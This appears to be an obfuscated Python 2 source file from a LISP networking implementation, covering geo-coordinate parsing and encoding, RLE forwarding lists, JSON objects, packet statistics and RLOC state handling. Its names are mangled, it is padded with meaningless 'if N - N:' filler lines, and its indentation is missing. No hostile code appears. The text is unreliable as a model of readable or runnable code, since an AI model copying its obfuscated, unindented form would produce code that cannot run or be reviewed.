if 5 - 5: iIii1I11I1II1 % OoOoOO00 % OOooOOo % O0 * oO0o . iIii1I11I1II1
if 96 - 96: i11iIiiIii + oO0o / I1ii11iIi11i . IiII % o0oOOo0O0Ooo
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 41 - 41: o0oOOo0O0Ooo . i1IIi - OOooOOo
if 19 - 19: o0oOOo0O0Ooo % I1Ii111 % I11i
def parse_geo_string ( self , geo_str ) :
OO000o00 = geo_str . find ( "]" )
if ( OO000o00 != - 1 ) : geo_str = geo_str [ OO000o00 + 1 : : ]
if 1 - 1: I1IiiI / o0oOOo0O0Ooo - I1Ii111
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
if 88 - 88: O0
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , II1iiiIiiI = geo_str . split ( "/" )
self . radius = int ( II1iiiIiiI )
if 29 - 29: Ii1I % o0oOOo0O0Ooo - Ii1I
if 40 - 40: I1IiiI * O0 * iIii1I11I1II1 / Oo0Ooo
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
Ii1iIiI1I = geo_str [ 0 : 4 ]
iiii111I = geo_str [ 4 : 8 ]
if 87 - 87: ooOoO0o * OoOoOO00
if 3 - 3: i1IIi - Oo0Ooo + OoOoOO00 . I1Ii111 * iII111i - O0
if 66 - 66: o0oOOo0O0Ooo * I1Ii111 . O0 - iII111i
if 22 - 22: OoO0O00 / I1IiiI - I1IiiI - i11iIiiIii . I1IiiI - OOooOOo
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 27 - 27: ooOoO0o
if 34 - 34: OoooooooOO - I1Ii111 + I1Ii111 % IiII % OoooooooOO
if 24 - 24: I1Ii111 . Oo0Ooo / ooOoO0o * O0
if 85 - 85: I1IiiI - OOooOOo
self . latitude = int ( Ii1iIiI1I [ 0 ] )
self . lat_mins = int ( Ii1iIiI1I [ 1 ] )
self . lat_secs = int ( Ii1iIiI1I [ 2 ] )
if ( Ii1iIiI1I [ 3 ] == "N" ) : self . latitude = - self . latitude
if 7 - 7: i1IIi % II111iiii
if 33 - 33: iIii1I11I1II1 . O0 . oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
self . longitude = int ( iiii111I [ 0 ] )
self . long_mins = int ( iiii111I [ 1 ] )
self . long_secs = int ( iiii111I [ 2 ] )
if ( iiii111I [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
if 41 - 41: OoooooooOO % I11i . O0 + I1Ii111
def print_geo ( self ) :
OOo0oOoOOO0oo = "N" if self . latitude < 0 else "S"
iIi = "E" if self . longitude < 0 else "W"
if 100 - 100: OoO0O00 / O0 / OoOoOO00
OOOOooO0Oo0oo = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , OOo0oOoOOO0oo , abs ( self . longitude ) ,
self . long_mins , self . long_secs , iIi )
if 33 - 33: i1IIi / o0oOOo0O0Ooo . OoooooooOO
if ( self . no_geo_altitude ( ) == False ) :
OOOOooO0Oo0oo += "-" + str ( self . altitude )
if 8 - 8: I1IiiI * OOooOOo * IiII / I1IiiI + i1IIi
if 11 - 11: I11i * Ii1I * I1IiiI - I1IiiI % OoooooooOO
if 83 - 83: i11iIiiIii % iII111i * O0 % OoooooooOO
if 99 - 99: I1ii11iIi11i % I1ii11iIi11i * iII111i % oO0o
if 56 - 56: Oo0Ooo + i11iIiiIii - oO0o . Ii1I + IiII
if ( self . radius != 0 ) : OOOOooO0Oo0oo += "/{}" . format ( self . radius )
return ( OOOOooO0Oo0oo )
if 19 - 19: I11i * OoooooooOO . i1IIi
if 100 - 100: II111iiii
def geo_url ( self ) :
o0oOOo000o0 = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
o0oOOo000o0 = "10" if ( o0oOOo000o0 == "" or o0oOOo000o0 . isdigit ( ) == False ) else o0oOOo000o0
OoO0o0 , OO0Oo0OO0 = self . dms_to_decimal ( )
oo0o0O = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( OoO0o0 , OO0Oo0OO0 , OoO0o0 , OO0Oo0OO0 ,
# Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo . Ii1I
# iII111i + iII111i % OOooOOo . I1ii11iIi11i + OoooooooOO
o0oOOo000o0 )
return ( oo0o0O )
if 60 - 60: oO0o / oO0o - o0oOOo0O0Ooo + I1IiiI % OoO0O00 + i1IIi
if 2 - 2: I1ii11iIi11i * oO0o + iIii1I11I1II1 . I1IiiI
def print_geo_url ( self ) :
OOoooo = self . print_geo ( )
if ( self . radius == 0 ) :
oo0o0O = self . geo_url ( )
IIIiiiI1Ii1 = "<a href='{}'>{}</a>" . format ( oo0o0O , OOoooo )
else :
oo0o0O = OOoooo . replace ( "/" , "-" )
IIIiiiI1Ii1 = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( oo0o0O , OOoooo )
if 100 - 100: IiII % OoOoOO00 / Oo0Ooo * iII111i
return ( IIIiiiI1Ii1 )
if 46 - 46: I1IiiI
if 78 - 78: Oo0Ooo + ooOoO0o
def dms_to_decimal ( self ) :
OOOo , I11IiiIIIIiIi1ii , IIOoo0 = self . latitude , self . lat_mins , self . lat_secs
i1i = float ( abs ( OOOo ) )
i1i += float ( I11IiiIIIIiIi1ii * 60 + IIOoo0 ) / 3600
if ( OOOo > 0 ) : i1i = - i1i
iiI11 = i1i
if 57 - 57: I1ii11iIi11i
OOOo , I11IiiIIIIiIi1ii , IIOoo0 = self . longitude , self . long_mins , self . long_secs
i1i = float ( abs ( OOOo ) )
i1i += float ( I11IiiIIIIiIi1ii * 60 + IIOoo0 ) / 3600
if ( OOOo > 0 ) : i1i = - i1i
OOooIi11IiII = i1i
return ( ( iiI11 , OOooIi11IiII ) )
if 47 - 47: II111iiii + OOooOOo / II111iiii . OOooOOo
if 68 - 68: OoooooooOO
def get_distance ( self , geo_point ) :
o0oOO = self . dms_to_decimal ( )
I1Ii111Oo00o0o = geo_point . dms_to_decimal ( )
o00oo0oo = vincenty ( o0oOO , I1Ii111Oo00o0o )
return ( o00oo0oo . km )
if 52 - 52: IiII + ooOoO0o - II111iiii - OoooooooOO * OoO0O00 - iIii1I11I1II1
if 38 - 38: II111iiii % iIii1I11I1II1 * IiII * OoOoOO00 % II111iiii . I1IiiI
def point_in_circle ( self , geo_point ) :
Ii1i1iI1i = self . get_distance ( geo_point )
return ( Ii1i1iI1i <= self . radius )
if 69 - 69: ooOoO0o
if 2 - 2: OoOoOO00 / oO0o . I1ii11iIi11i % OoO0O00 - oO0o
def encode_geo ( self ) :
I1I1iiI1iIIii = socket . htons ( LISP_AFI_LCAF )
o0OoOOoO0o0 = socket . htons ( 20 + 2 )
OO000OOO = 0
if 21 - 21: ooOoO0o . o0oOOo0O0Ooo . oO0o . i1IIi
OoO0o0 = abs ( self . latitude )
O000oooooo0 = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : OO000OOO |= 0x40
if 40 - 40: i1IIi
OO0Oo0OO0 = abs ( self . longitude )
O0O00o0oo0 = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : OO000OOO |= 0x20
if 31 - 31: iIii1I11I1II1 * OoO0O00 - I11i . OoO0O00 % iIii1I11I1II1
oO0o00ooO = 0
if ( self . no_geo_altitude ( ) == False ) :
oO0o00ooO = socket . htonl ( self . altitude )
OO000OOO |= 0x10
if 83 - 83: OoOoOO00 . I11i
II1iiiIiiI = socket . htons ( self . radius )
if ( II1iiiIiiI != 0 ) : OO000OOO |= 0x06
if 88 - 88: I1Ii111 * ooOoO0o - Ii1I % OoooooooOO . OOooOOo + OoOoOO00
i1II1Iii = struct . pack ( "HBBBBH" , I1I1iiI1iIIii , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , o0OoOOoO0o0 )
i1II1Iii += struct . pack ( "BBHBBHBBHIHHH" , OO000OOO , 0 , 0 , OoO0o0 , O000oooooo0 >> 16 ,
socket . htons ( O000oooooo0 & 0x0ffff ) , OO0Oo0OO0 , O0O00o0oo0 >> 16 ,
socket . htons ( O0O00o0oo0 & 0xffff ) , oO0o00ooO , II1iiiIiiI , 0 , 0 )
if 74 - 74: ooOoO0o * i11iIiiIii + I1ii11iIi11i - ooOoO0o . OoOoOO00
return ( i1II1Iii )
if 96 - 96: Ii1I + Oo0Ooo * I1Ii111 - I11i * I1Ii111
if 32 - 32: I1IiiI / i1IIi / I1ii11iIi11i % i1IIi . ooOoO0o % I1ii11iIi11i
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
o00OooooOOOO = "BBHBBHBBHIHHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( lcaf_len < oO0o00O ) : return ( None )
if 97 - 97: OoO0O00 . OOooOOo % Ii1I + OoooooooOO * I1Ii111
OO000OOO , o0OOoO00Oo , OoOo0 , OoO0o0 , i11iIIiIIiii , O000oooooo0 , OO0Oo0OO0 , oo000 , O0O00o0oo0 , oO0o00ooO , II1iiiIiiI , o00OO00Oo0 , oO0oO00 = struct . unpack ( o00OooooOOOO ,
# I1ii11iIi11i * OOooOOo . ooOoO0o % i1IIi . IiII / OoOoOO00
packet [ : oO0o00O ] )
if 98 - 98: Ii1I % iII111i . OoooooooOO - i1IIi % I1Ii111
if 94 - 94: i1IIi + iII111i
if 25 - 25: I1Ii111 . Ii1I - Ii1I . o0oOOo0O0Ooo - IiII
if 91 - 91: o0oOOo0O0Ooo % I1ii11iIi11i % OoOoOO00 * iIii1I11I1II1
oO0oO00 = socket . ntohs ( oO0oO00 )
if ( oO0oO00 == LISP_AFI_LCAF ) : return ( None )
if 18 - 18: OoOoOO00 * I1ii11iIi11i . i1IIi * iII111i
if ( OO000OOO & 0x40 ) : OoO0o0 = - OoO0o0
self . latitude = OoO0o0
O0oooo = ( ( i11iIIiIIiii << 16 ) | socket . ntohs ( O000oooooo0 ) ) / 1000
self . lat_mins = O0oooo / 60
self . lat_secs = O0oooo % 60
if 43 - 43: OoooooooOO + i1IIi . O0
if ( OO000OOO & 0x20 ) : OO0Oo0OO0 = - OO0Oo0OO0
self . longitude = OO0Oo0OO0
iiIiI111 = ( ( oo000 << 16 ) | socket . ntohs ( O0O00o0oo0 ) ) / 1000
self . long_mins = iiIiI111 / 60
self . long_secs = iiIiI111 % 60
if 85 - 85: II111iiii / o0oOOo0O0Ooo . iIii1I11I1II1 . OoooooooOO / Ii1I
self . altitude = socket . ntohl ( oO0o00ooO ) if ( OO000OOO & 0x10 ) else - 1
II1iiiIiiI = socket . ntohs ( II1iiiIiiI )
self . radius = II1iiiIiiI if ( OO000OOO & 0x02 ) else II1iiiIiiI * 1000
if 18 - 18: i11iIiiIii + o0oOOo0O0Ooo . i11iIiiIii
self . geo_name = None
packet = packet [ oO0o00O : : ]
if 50 - 50: IiII / OoooooooOO . I11i
if ( oO0oO00 != 0 ) :
self . rloc . afi = oO0oO00
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 93 - 93: OOooOOo / OoooooooOO % iII111i % Ii1I / I1Ii111 % OOooOOo
return ( packet )
if 25 - 25: i1IIi % Oo0Ooo . i1IIi * OoOoOO00 . Ii1I % OoO0O00
if 47 - 47: o0oOOo0O0Ooo - i11iIiiIii / OoooooooOO
if 93 - 93: I1IiiI * II111iiii * O0 % o0oOOo0O0Ooo + oO0o / ooOoO0o
if 79 - 79: OoO0O00 + ooOoO0o / oO0o % I1ii11iIi11i
if 77 - 77: Ii1I / Ii1I / I1ii11iIi11i
if 92 - 92: O0 * i11iIiiIii . OoOoOO00 * IiII / o0oOOo0O0Ooo * ooOoO0o
class lisp_rle_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 74 - 74: O0 - o0oOOo0O0Ooo
if 68 - 68: I1Ii111
def copy_rle_node ( self ) :
Oo0000O00o0 = lisp_rle_node ( )
Oo0000O00o0 . address . copy_address ( self . address )
Oo0000O00o0 . level = self . level
Oo0000O00o0 . translated_port = self . translated_port
Oo0000O00o0 . rloc_name = self . rloc_name
return ( Oo0000O00o0 )
if 19 - 19: o0oOOo0O0Ooo
if 63 - 63: OoooooooOO % ooOoO0o
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 26 - 26: OOooOOo + Oo0Ooo
if 97 - 97: I1Ii111 * I1Ii111 + iII111i % Ii1I / iII111i
def get_encap_keys ( self ) :
IIi1I1iII111 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 73 - 73: OoOoOO00 % I1Ii111 . I1ii11iIi11i
oOo0O = self . address . print_address_no_iid ( ) + ":" + IIi1I1iII111
if 45 - 45: iIii1I11I1II1 % Ii1I . OoOoOO00 . o0oOOo0O0Ooo - OoooooooOO
try :
O0000 = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if ( O0000 [ 1 ] ) : return ( O0000 [ 1 ] . encrypt_key , O0000 [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 46 - 46: I1ii11iIi11i
if 32 - 32: iII111i * i11iIiiIii / IiII + i11iIiiIii + O0
if 51 - 51: I1Ii111
if 95 - 95: Ii1I / Ii1I * OoO0O00 . OoooooooOO . OoooooooOO * I11i
class lisp_rle ( ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 76 - 76: OoooooooOO - Ii1I + IiII % OoOoOO00 / OoooooooOO
if 55 - 55: i11iIiiIii - IiII * OOooOOo + II111iiii . I1ii11iIi11i / O0
def copy_rle ( self ) :
OoO000oo000o0 = lisp_rle ( self . rle_name )
for Oo0000O00o0 in self . rle_nodes :
OoO000oo000o0 . rle_nodes . append ( Oo0000O00o0 . copy_rle_node ( ) )
if 16 - 16: II111iiii . Oo0Ooo * I1Ii111 + o0oOOo0O0Ooo - i11iIiiIii
OoO000oo000o0 . build_forwarding_list ( )
return ( OoO000oo000o0 )
if 98 - 98: II111iiii - i1IIi - ooOoO0o
if 36 - 36: IiII + o0oOOo0O0Ooo
def print_rle ( self , html ) :
Oo0iIIIIi = ""
for Oo0000O00o0 in self . rle_nodes :
IIi1I1iII111 = Oo0000O00o0 . translated_port
OO00O = blue ( Oo0000O00o0 . rloc_name , html ) if Oo0000O00o0 . rloc_name != None else ""
if 62 - 62: II111iiii . oO0o / I11i . oO0o / i1IIi + o0oOOo0O0Ooo
oOo0O = Oo0000O00o0 . address . print_address_no_iid ( )
if ( Oo0000O00o0 . address . is_local ( ) ) : oOo0O = red ( oOo0O , html )
Oo0iIIIIi += "{}{}(L{}){}, " . format ( oOo0O , "" if IIi1I1iII111 == 0 else ":" + str ( IIi1I1iII111 ) , Oo0000O00o0 . level ,
# I1ii11iIi11i
"" if Oo0000O00o0 . rloc_name == None else OO00O )
if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
return ( Oo0iIIIIi [ 0 : - 2 ] if Oo0iIIIIi != "" else "" )
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
def build_forwarding_list ( self ) :
i1Ii = - 1
for Oo0000O00o0 in self . rle_nodes :
if ( i1Ii == - 1 ) :
if ( Oo0000O00o0 . address . is_local ( ) ) : i1Ii = Oo0000O00o0 . level
else :
if ( Oo0000O00o0 . level > i1Ii ) : break
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
if 32 - 32: OOooOOo
i1Ii = 0 if i1Ii == - 1 else Oo0000O00o0 . level
if 46 - 46: II111iiii . OoO0O00
self . rle_forwarding_list = [ ]
for Oo0000O00o0 in self . rle_nodes :
if ( Oo0000O00o0 . level == i1Ii or ( i1Ii == 0 and
Oo0000O00o0 . level == 128 ) ) :
if ( lisp_i_am_rtr == False and Oo0000O00o0 . address . is_local ( ) ) :
oOo0O = Oo0000O00o0 . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( oOo0O ) )
continue
if 97 - 97: oO0o
self . rle_forwarding_list . append ( Oo0000O00o0 )
if 45 - 45: i11iIiiIii / IiII + OoO0O00
if 55 - 55: Ii1I / II111iiii - oO0o
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
class lisp_json ( ) :
def __init__ ( self , name , string ) :
self . json_name = name
self . json_string = string
if 28 - 28: i1IIi . I1IiiI
if 41 - 41: I1ii11iIi11i . I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
if 4 - 4: I1Ii111
def delete ( self ) :
if ( lisp_json_list . has_key ( self . json_name ) ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 85 - 85: iIii1I11I1II1 % Oo0Ooo
if 20 - 20: IiII + i11iIiiIii * OOooOOo
if 27 - 27: O0 * OoO0O00 * I1ii11iIi11i
def print_json ( self , html ) :
IiIII1I = self . json_string
I1iiiII1Ii1i1 = "***"
if ( html ) : I1iiiII1Ii1i1 = red ( I1iiiII1Ii1i1 , html )
II111IIII = I1iiiII1Ii1i1 + self . json_string + I1iiiII1Ii1i1
if ( self . valid_json ( ) ) : return ( IiIII1I )
return ( II111IIII )
if 34 - 34: o0oOOo0O0Ooo
if 76 - 76: oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 51 - 51: II111iiii / OoOoOO00
return ( True )
if 69 - 69: i11iIiiIii
if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
if 93 - 93: I1IiiI % O0 * OoO0O00 % OoOoOO00 . I1Ii111 * I1IiiI
if 95 - 95: IiII + o0oOOo0O0Ooo - o0oOOo0O0Ooo
if 83 - 83: ooOoO0o
if 59 - 59: I1ii11iIi11i
class lisp_stats ( ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 26 - 26: I11i . Ii1I
if 94 - 94: ooOoO0o . I1IiiI + IiII % I1IiiI / o0oOOo0O0Ooo % o0oOOo0O0Ooo
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 21 - 21: O0 / OOooOOo - II111iiii + I1ii11iIi11i / OoooooooOO
if 81 - 81: i11iIiiIii / Oo0Ooo * i1IIi + OoO0O00 + O0 % I1ii11iIi11i
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . last_increment
return ( o0O0oO0 <= 1 )
if 3 - 3: i11iIiiIii * IiII . Oo0Ooo % OoOoOO00 * I11i . iII111i
if 80 - 80: I11i - IiII
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . last_increment
return ( o0O0oO0 <= 60 )
if 40 - 40: OOooOOo * I1IiiI % I11i . I1Ii111 % O0 . O0
if 14 - 14: ooOoO0o . OoOoOO00 + ooOoO0o * OoOoOO00 . OoOoOO00 * Oo0Ooo
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 40 - 40: OoooooooOO
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . OoOoOO00 % iIii1I11I1II1 % OoOoOO00
return ( c1 , c2 )
if 92 - 92: o0oOOo0O0Ooo + II111iiii
if 56 - 56: OoOoOO00 - OoOoOO00 / Ii1I
def normalize ( self , count ) :
count = str ( count )
oooIIi1i = len ( count )
if ( oooIIi1i > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 64 - 64: i1IIi * II111iiii + I1ii11iIi11i + OOooOOo % I1ii11iIi11i - OoooooooOO
if ( oooIIi1i > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 96 - 96: IiII + oO0o / Oo0Ooo + OoooooooOO
if ( oooIIi1i > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 53 - 53: Ii1I * IiII + Oo0Ooo + i11iIiiIii - iIii1I11I1II1
return ( count )
if 66 - 66: O0 - I1ii11iIi11i * iIii1I11I1II1 - I1Ii111 / I1ii11iIi11i
if 24 - 24: Ii1I
def get_stats ( self , summary , html ) :
ii1Iii1Iii = self . last_rate_check
oOooo0Ooooo0 = self . last_packet_count
oOOOo = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 90 - 90: I1IiiI - OOooOOo / OoO0O00 / I11i
ii1iIi1Ii1I11I = self . last_rate_check - ii1Iii1Iii
if ( ii1iIi1Ii1I11I == 0 ) :
o0oOO0OO0000O = 0
Oo0OoOoooo0O = 0
else :
o0oOO0OO0000O = int ( ( self . packet_count - oOooo0Ooooo0 ) / ii1iIi1Ii1I11I )
Oo0OoOoooo0O = ( self . byte_count - oOOOo ) / ii1iIi1Ii1I11I
Oo0OoOoooo0O = ( Oo0OoOoooo0O * 8 ) / 1000000
Oo0OoOoooo0O = round ( Oo0OoOoooo0O , 2 )
if 47 - 47: I1IiiI / o0oOOo0O0Ooo
if 47 - 47: i1IIi / Oo0Ooo % IiII % OoO0O00 + Ii1I
if 31 - 31: I11i / I11i
if 90 - 90: II111iiii . I1Ii111
if 26 - 26: I1Ii111 * O0 / oO0o
iI1iIii11i1i = self . normalize ( self . packet_count )
IiI1iiI11 = self . normalize ( self . byte_count )
if 6 - 6: ooOoO0o + OOooOOo - I1IiiI + OOooOOo
if 16 - 16: OoO0O00 * OoOoOO00 - Oo0Ooo
if 44 - 44: ooOoO0o / OoOoOO00 - O0 + iII111i / iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 - iII111i / O0
if 39 - 39: OoooooooOO * iIii1I11I1II1 - o0oOOo0O0Ooo / O0
if ( summary ) :
I1IIIIiiii = "<br>" if html else ""
iI1iIii11i1i , IiI1iiI11 = self . stat_colors ( iI1iIii11i1i , IiI1iiI11 , html )
I111II = "packet-count: {}{}byte-count: {}" . format ( iI1iIii11i1i , I1IIIIiiii , IiI1iiI11 )
O0ooOoo0O000O = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( o0oOO0OO0000O , Oo0OoOoooo0O )
if 22 - 22: I1Ii111 - OOooOOo * i1IIi
if ( html != "" ) : O0ooOoo0O000O = lisp_span ( I111II , O0ooOoo0O000O )
else :
O0Oo0OO = str ( o0oOO0OO0000O )
O0O0OO = str ( Oo0OoOoooo0O )
if ( html ) :
iI1iIii11i1i = lisp_print_cour ( iI1iIii11i1i )
O0Oo0OO = lisp_print_cour ( O0Oo0OO )
IiI1iiI11 = lisp_print_cour ( IiI1iiI11 )
O0O0OO = lisp_print_cour ( O0O0OO )
if 56 - 56: oO0o - Ii1I % I1Ii111
I1IIIIiiii = "<br>" if html else ", "
if 100 - 100: OOooOOo * IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
O0ooOoo0O000O = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( iI1iIii11i1i , I1IIIIiiii , O0Oo0OO , I1IIIIiiii , IiI1iiI11 , I1IIIIiiii ,
# i11iIiiIii
O0O0OO )
if 32 - 32: I1Ii111 . I1IiiI
return ( O0ooOoo0O000O )
if 78 - 78: OoOoOO00 . I1ii11iIi11i / o0oOOo0O0Ooo
if 57 - 57: IiII % O0 * I1ii11iIi11i
if 61 - 61: O0
if 51 - 51: I1Ii111 - I11i % o0oOOo0O0Ooo * Oo0Ooo - oO0o + II111iiii
if 7 - 7: oO0o
if 98 - 98: Ii1I + oO0o + i1IIi + IiII % IiII
if 79 - 79: oO0o % I11i * I11i . OOooOOo % OoooooooOO
if 71 - 71: iII111i
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 48 - 48: OoOoOO00 + oO0o
if 15 - 15: i11iIiiIii / IiII * I1ii11iIi11i - O0 % II111iiii + Ii1I
if 100 - 100: Ii1I + O0 . iII111i - Ii1I + O0 . OOooOOo
if 77 - 77: OOooOOo * OoOoOO00 - i1IIi * I1IiiI . I1Ii111
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
if 37 - 37: i1IIi - O0
if ( recurse == False ) : return
if 36 - 36: I1Ii111 . OoooooooOO - i1IIi % iII111i - II111iiii * i11iIiiIii
if 90 - 90: OoOoOO00 % iII111i - Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / O0 . I1Ii111 * I1Ii111
if 76 - 76: Ii1I - iII111i
if 79 - 79: o0oOOo0O0Ooo + IiII / o0oOOo0O0Ooo - I1IiiI / OoooooooOO
if 17 - 17: OOooOOo * I1ii11iIi11i . Ii1I . iIii1I11I1II1 * OoooooooOO
Oo0O00OOOO = lisp_get_default_route_next_hops ( )
if ( Oo0O00OOOO == [ ] or len ( Oo0O00OOOO ) == 1 ) : return
if 7 - 7: ooOoO0o * OoO0O00 / II111iiii % OoOoOO00 * OOooOOo . II111iiii
self . rloc_next_hop = Oo0O00OOOO [ 0 ]
i11 = self
for I1ii1I1II11II in Oo0O00OOOO [ 1 : : ] :
O0ooo00Oo = lisp_rloc ( False )
O0ooo00Oo = copy . deepcopy ( self )
O0ooo00Oo . rloc_next_hop = I1ii1I1II11II
i11 . next_rloc = O0ooo00Oo
i11 = O0ooo00Oo
if 98 - 98: OOooOOo + i11iIiiIii - i1IIi
if 26 - 26: OoOoOO00 / o0oOOo0O0Ooo . OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 73 - 73: Oo0Ooo . OoOoOO00
if 50 - 50: IiII / o0oOOo0O0Ooo
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
